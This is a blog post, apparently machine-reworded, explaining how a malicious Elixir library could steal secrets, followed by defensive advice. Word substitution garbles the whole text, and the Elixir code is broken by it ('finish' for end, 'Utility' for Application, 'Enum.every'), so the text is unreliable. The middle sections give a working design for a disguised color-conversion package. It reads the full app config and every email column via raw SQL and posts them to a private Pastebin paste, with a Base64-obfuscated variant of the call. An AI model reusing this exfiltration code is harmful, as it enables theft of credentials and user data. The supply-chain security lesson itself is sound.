How malicious libraries can steal all of your software secrets and techniques

Welcome again, of us!

My girlfriend broke up with me
when she came upon I solely had 9 toes. 

She was lack toes illiberal.

Alright. In the present day, we’ll check out safety points when utilizing third-party libraries in your Elixir purposes. In the event you add libraries to your software, you may get robbed of all of your secrets and techniques and consumer knowledge. I’ll present you what a malicious library might appear to be and how one can shield your self in opposition to this. So cling on and let’s get cracking!

???? The Drawback

All of us use libraries to develop our software program. Often, the method of including a library is straightforward. You google an issue, discover a library that fixes it, and add it to your combine.exs file. You run combine deps.get, examine if the library does what it promised, and push every part to manufacturing. Straightforward.

However while you add a library, you copy anyone else’s code into your software. So, how have you learnt that it’s not malicious? You may say: I do not. I belief it. and also you wouldn’t be alone. I do that too, however we shouldn’t.

Malicious. libraries. are. not. uncommon.

The largest downside is when attackers publish malicious libraries to a package deal supervisor like npm, RubyGems, or hex. They change into instantly accessible to hundreds of thousands of builders and putting in them solely requires bumping a model quantity. With little effort, attackers can compromise loads of targets.

There’s a myriad of how how a malicious library can get right into a package deal supervisor, however these are the commonest ones:

The attacker publishes the library. That is the simplest method, however the attacker has to generate traction for the library first. Individuals have to start out utilizing the library earlier than you may compromise them. This takes probably the most effort on the attacker’s facet as a result of the library should provide some worth that convinces the customers so as to add it. The attacker would most definitely attempt to add the library as a dependency to an current library with a pull request on GitHub. Nonetheless, there’s a neater methodology.

The attacker takes over an current library. That is the simplest and quickest method for an attacker to publish a malicious library. They’ll take over an current library, add malicious code, and publish a brand new model. Current customers will bump the model quantity and begin utilizing the malicious model of the library normally with out noticing. The attacker can take over an current library by authorized methods, for instance by taking on possession of a library that wants a brand new maintainer. That’s why maintainer vetting is essential for widespread libraries.

The attacker might additionally attempt to steal the GitHub credentials of an creator of a well-liked library and publish a malicious model beneath their identify. So, if you happen to’re the creator of a library, higher shield your account as a lot as attainable. You won’t discover that your credentials are stolen till it’s too late.

Essentially the most tough model can be a supply-chain assault the place an attacker penetrates the servers on which the library is compiled earlier than it will get printed. Earlier than the compilation, the attacker can add malicious code and no person would discover. That is the nastiest assault as a result of no person would discover until they evaluate the code on the package deal supervisor with the code on GitHub, which no person does. Some libraries come as compiled binaries, so that you couldn’t even evaluate uncooked code however must compile and evaluate the binaries of your library in opposition to the model on the package deal supervisor. Until you automate this step, you’d by no means do it.

The attacker takes over a retired/deleted library. Most package deal managers don’t permit this, but it surely may occur that an creator deletes an current library and the attacker publishes a brand new library with the identical identify and model proper after. The brand new library would comprise the identical code because the outdated one plus some malicious nastiness. The worst factor is that victims wouldn’t even have to bump a model quantity. After they redeploy their server, they might re-fetch the identical library with the identical model however would now get a malicious model as an alternative. Many package deal managers block the names of retired libraries.

So, I hope that you simply now perceive that trusting your dependencies blindly is a foul factor.

To drive residence my argument, I’ll present you precisely how we are able to construct a malicious library with Elixir. Now, I’m not revealing any well-kept secrets and techniques right here. Writing the library took me 2 hours and some ChatGPT prompts, so anyone might do it. Let’s dive in.

???? The Library

The library could be very easy. All it does is convert HEX colour codes into RBG values. Right here’s what the primary module appears to be like like:

defmodule Colours.Convert do
 def hex_to_rbg(hex) do
    hex = String.substitute(hex, "#", "")

    <<r::binary-dimension(2), g::binary-dimension(2), b::binary-dimension(2)>> = hex

    {r, ""} = Integer.parse(r, 16)
    {g, ""} = Integer.parse(g, 16)
    {b, ""} = Integer.parse(b, 16)
    {r, g, b}
 finish
finish

Now, the purpose of this train is so as to add nastiness to an in any other case harmless-looking library, so let’s try this.

???? Beginning the Assault Course of

For our maliciousness, we are going to benefit from the truth that Elixir begins the GenServers of dependencies that outline an Utility. So, when the primary app begins, the processes of all dependencies begin as properly. That is nice for spinning up a GenServer that steals all of your secrets and techniques, so let’s do it.

That is how the appliance of our library would appear to be:

defmodule Assault.Utility do
 use Utility

 @impl true
 def begin(_type, _args) do
    kids = [
 Attack.Worker
    ]
    opts = [strategy: :one_for_one, name: Attack.Supervisor]
 Supervisor.start_link(kids, opts)
 finish
finish

You may discover that we renamed the Colours namespace to Assault right here. This fashion, autocomplete won’t expose our maliciousness. If a consumer needs to make use of our library, they’ll most definitely kind Colours. and hit tab to see all attainable capabilities. In that case, we don’t need that listing to indicate our nasty capabilities as properly, so we put all our malicious modules beneath the Assault namespace.

Subsequent, let’s have a look at the module that can execute the assault:

defmodule Assault.Employee do
 use GenServer

 require Logger

 def start_link(init_args) do
 GenServer.start_link(__MODULE__, [init_args])
 finish

 def init(_args) do
    schedule_attack()
    {:okay, :initial_state}
 finish

 defp schedule_attack() do
 Course of.send_after(self(), :assault, 60_000)
 finish

 def handle_info(:assault, state) do
 # That is the place we'll steal the secrets and techniques.

    {:noreply, state}
 finish
finish

The module is straightforward: It defines a GenServer that begins up and schedules a message known as :assault for 60 seconds sooner or later. The rationale why we delay the assault is that we wish to wait till the whole software – together with Ecto Repos – is began. This fashion, we all know that the appliance began efficiently and the configuration is right.

???? Stealing your Utility Config

The very first thing that we’ll do is steal the whole software configuration, together with all loaded setting variables. That is how:

def handle_info(:assault, state) do
  repos = apply(Ecto.Repo, :all_running, [])
 Enum.every(repos, &steal_config/1)

  {:noreply, state}
finish

defp steal_config(repo) do
  app = Utility.get_application(repo)
  config = Utility.get_all_env(app)
 # That is the place we'll submit the config to Pastebin later.
finish

First, we wish to learn out the config for the operating software. There’s no method (that I do know) of discovering out the “mum or dad” software that makes use of a library, so we now have to create a workaround. First, we fetch all operating Ecto.Repos. However we don’t need our library to rely upon Ecto. The consumer may get suspicious why our color-converting library wants Ecto. But when we name Ecto.Repo.all_running() right here, the compiler will throw a warning that Ecto.Repo is undefined. So, we use the apply/3 operate as an alternative. This fashion, we are able to nonetheless name Ecto.Repo.all_running() at runtime, however the compiler received’t complain.

Subsequent, we iterate by all operating repos and get the appliance that’s operating them. This fashion, we are able to learn the appliance’s config utilizing Utility.get_all_env(app). Now, we now have all configurations of the operating app. It will embrace every part from database credentials to the key key base of a Phoenix software to doubtlessly secret API keys for interacting with exterior providers. Nice!

???? Posting the Secrets and techniques to Pastebin

Now, stealing the appliance config doesn’t assist us if we are able to’t get it off the server and onto a platform the place we are able to learn it. Let’s use Pastebin for that. Pastebin permits you to create textual content information with a easy API name. Now, we might additionally ship the configuration again to a server beneath our management. That is known as a Command and Control (CnC) server. For this objective although, Pastebin will suffice.

For posting the config to Pastebin, we don’t wish to rely upon a third-party library that may give us away. Subsequently, we are going to use erlang’s built-in :httpc shopper. It permits us to make HTTP requests to Pastebin. Right here’s how:

defp send_secret(secret) do
 :inets.begin()

  url = "https://pastebin.com/api/api_post.php"

  payload =
 "api_dev_key=MY_DEV_KEY&api_option=paste&api_paste_private=2&api_user_key=MY_USER_KEY&api_paste_code=#{examine(secret)}"

 :httpc.request(:submit, {url, [], ~c"software/x-www-form-urlencoded", payload}, [], [])
finish

As you may see, :httpc is fairly low-level, however belief me once I say that the code above makes a POST request to Pastebin with some type knowledge. The parameters that we ship listed below are:

• api_dev_key: The entry key to Pastebin’s API. I generated this by signing as much as Pastebin with a masked e mail.
• api_option: Tells Pastebin that we wish to paste the content material into a brand new file.
• api_paste_private: Tells Pastebin to make the brand new file non-public in order that solely we are able to learn it. We don’t need different folks to see the configuration on Pastebin.
• api_user_key: Tells Pastebin which consumer the file shouldn’t be linked to (my profile). If we don’t present this parameter, we are able to’t make the file non-public.
• api_paste_code: The stolen configuration. We are able to ship any textual content right here.

You will discover the total code on GitHub.

And that’s it! Now, we are going to steal the appliance’s configuration and submit it on Pastebin from the place we are able to then retrieve it for additional malicious actions. Right here’s a screenshot of how the file appears to be like like on Pastebin:

???? Stealing your Consumer Knowledge

Now that we are able to steal any secrets and techniques and submit them to Pastebin, let’s go one step additional and steal all consumer knowledge saved within the database. Our library can execute uncooked SQL, so let’s leverage that. First, we wish to discover all tables that comprise a subject known as e mail or emails. Then, we’ll extract all emails saved in these tables and ship them off to Pastebin. Right here’s the code for that:

def handle_info(:assault, state) do
  repos = apply(Ecto.Repo, :all_running, [])
 Enum.every(repos, &steal_config/1)
 Enum.every(repos, &steal_emails/1)

  {:noreply, state}
finish

defp steal_emails(repo) do
  tables = get_tables_with_emails(repo)
 Enum.every(tables, fn desk -> do_steal_emails(repo, desk) finish)
finish

defp get_tables_with_emails(repo) do
  question = """
    SELECT table_name
    FROM information_schema.columns
    WHERE column_name in ('e mail', 'emails');
  """

  {:okay, consequence} = apply(Ecto.Adapters.SQL, :question, [repo, query])
 Record.flatten(consequence.rows)
finish

defp do_steal_emails(repo, desk) do
  question = "SELECT e mail FROM #{desk}"

  {:okay, consequence} = apply(Ecto.Adapters.SQL, :question, [repo, query])
  emails = Record.flatten(consequence.rows)
  send_secret(emails)
finish

Let’s stroll by the code above. First, we undergo each repo and execute a SQL question that returns all tables that comprise the column e mail or emails. In the event you generated your authentication system with combine phx.gen.auth, your customers desk can have this column.

Subsequent, for all tables that comprise an e mail column, we retrieve all consumer emails, that are normally saved in plaintext. We then ship off the listing of emails by :httpc to Pastebin utilizing the send_secret/1 operate.

And that’s it! We now have now stolen the appliance configuration and the e-mail tackle of all customers. Good!

I’ll cease right here, however I hope you get the thought. Any library that you simply pull into your software can entry just about every part. You have to be very cautious with the libraries that you simply use.

I didn’t dive into all attainable ways in which a third-library might compromise your software. Remember {that a} library has entry to every part, even your file system. So, it might additionally take away all of your information and folders and wipe your total server if it wished to.

Now, your first intuition could be: I am going to simply learn all code from all libraries on GitHub earlier than utilizing them!. Sadly, I’ve unhealthy information for you. The code that you simply obtain from Hex.pm won’t be the code that you simply see on GitHub. So, if you happen to learn the code, make certain to do it on Hex.pm. So far as I do know, Hex doesn’t whether or not these are the identical. You might create a checksum of the code on GitHub and evaluate it with the checksum that Hex offers you, however that could be tedious.

???? Find out how to shield your self

You may assume now: That is horrible! How can I shield myself? and sadly, there’s no straightforward reply. Nevertheless, I reached out to the Hex Core Staff and bought some helpful suggestions by the extremely useful Wojtek Mach.
I additionally requested Michael Lubas for options. Michael is the founding father of Paraxial.io, a cybersecurity agency targeted on Elixir purposes. Here’s what they needed to say.

Based on Wojtek, the Hex package deal supervisor conducts no safety scanning of its packages and wouldn’t have flagged the assaults above. Safety scans like checking for HTTP calls to Pastebin are pointless as a result of attackers can circumvent the scans simply by obfuscating the code. For instance, we are able to obfuscate the :httpc-call above by Base64 encoding each the :httpc atom and the URL:

apply("aHR0cGM=" |> Base.decode64!() |> String.to_atom(), :request, [Base.decode64!("aHR0cHM6Ly9wYXN0ZWJpbi5jb20=")])

# This is the same as:
apply(:httpc, :request, ["https://pastebin.com"])

Hex does reserve library names endlessly although. Even if you happen to retire a package deal, no person can take over the library identify. So, that a minimum of is one much less headache.

See Also

California strikes to silence Stanford researchers who acquired state information to review schooling points

Now, here’s what you are able to do to cut back the danger of including malicious libraries to your challenge.

???? Learn the Code

First, earlier than you add a library, undergo its code on Hex.pm not on GitHub. Hex doesn’t examine whether or not the code of a package deal is the same as its GitHub repository. So, a library may need totally different code on GitHub than on Hex.pm. To learn the library code on Hex, click on on the little <> signal subsequent to its newest model. After studying by a library’s code, you sadly additionally should learn by the code of its dependencies. Hex exhibits you an inventory of all dependencies subsequent to the package deal variations.

The final step earlier than including the library is checking the writer. Hex exhibits you the profile of who printed a library within the package deal overview. It’s best to examine that the person who maintains the code on e.g. GitHub additionally publishes the package deal. If not, examine the writer completely and ensure that it’s not an attacker that took anyone’s code and printed one other library with an analogous identify to the unique library.

Right here is the place yow will discover these choices on hex.pm:

???? Examine library updates

After you add a library, it is best to re-read the code for each new model earlier than updating. Fortunately, Hex gives a handy solution to see the modifications between the brand new to the outdated model. You may go to diff.hex.pm, enter the library identify, and choose the earlier model and the model you wish to replace. You too can open the diff view on the package deal facet by clicking on the little web page icon subsequent to a model quantity. See the screenshot above.

Lastly, you may listing your dependencies and their newest model utilizing combine hex.outdated. It will generate an inventory of all packages, their model in your software, their newest model, and whether or not you may replace to them robotically. On the finish of the output, hex gives a hyperlink to diff.hex.pm that lists all packages to which you’ll replace robotically.

Dependency Present Newest Standing 
httpoison 1.8.2 2.1.0 Replace not attainable 
phoenix 1.7.6 1.7.7 Replace attainable 
phoenix_live_view 0.19.3 0.19.5 Replace attainable 
phoenix_view 2.0.2 2.0.2 Up-to-date 
postgrex 0.17.1 0.17.2 Replace attainable 

Run `combine hex.outdated APP` to see necessities for a particular dependency.

To view the diffs in every accessible replace, go to:
https://hex.pm/l/QKnyu

In the event you click on the hyperlink on the finish of the output, you’ll open a web site that appears like this:

???? Block outbound Visitors

A typical failsafe for stopping malicious libraries from “phoning residence” is to dam outbound site visitors from the servers by default. In our case, the malicious library sends our secrets and techniques to Pastebin through HTTP name. If we block outgoing requests, we nonetheless have a malicious library in our software, however a minimum of we prevented the extraction of our secrets and techniques.

Not each internet hosting supplier gives such performance out-of-the-box sadly. Often, it’s a must to set up software program like Stripe’s Smokescreen that provides a layer of safety to your servers. Right here’s the right way to add Smokescreen to Fly.io. After including this, you may configure which exterior URLs you permit and Smokescreen will block every part else. It’s not straightforward to arrange and keep, however it is going to be value it if you happen to get attacked.

???? Audit your System

Ideally, you learn all code of each library and of all their dependencies, however let’s be trustworthy: Until you’re extraordinarily security-focused, you in all probability received’t try this. Fortunately, there are safety consultants like Michael on the market who do it for you (for a value clearly). Simply just be sure you add your third-party libraries to the scope of a safety audit while you enlist a pentester.

I depart one honorable point out for combine hex.audit which warns you if you happen to rely upon a retired hex package deal. More often than not, this received’t do something, however with out it, you won’t discover you depend on a retired library that received’t obtain future upkeep and safety updates. So, higher put combine hex.audit in your construct pipeline and overlook about it.

???? Final Phrases

I hope this submit didn’t make you panic and name for an emergency workers assembly. Sure, very unhealthy issues can occur and it is best to preserve that in thoughts. However you may mitigate the danger. Simply watch out while you add a library. Keep away from it when you may. And if it’s a must to, make certain it comes from a good supply and skim by its code. Block all outbound site visitors if you happen to can.

???? Conclusion

And that’s it! I hope you loved this text! If you wish to assist me, you should buy my book or video course. Comply with me on Twitter or subscribe to my e-newsletter under if you wish to get notified once I publish the following weblog submit. Till the following time! Cheerio ????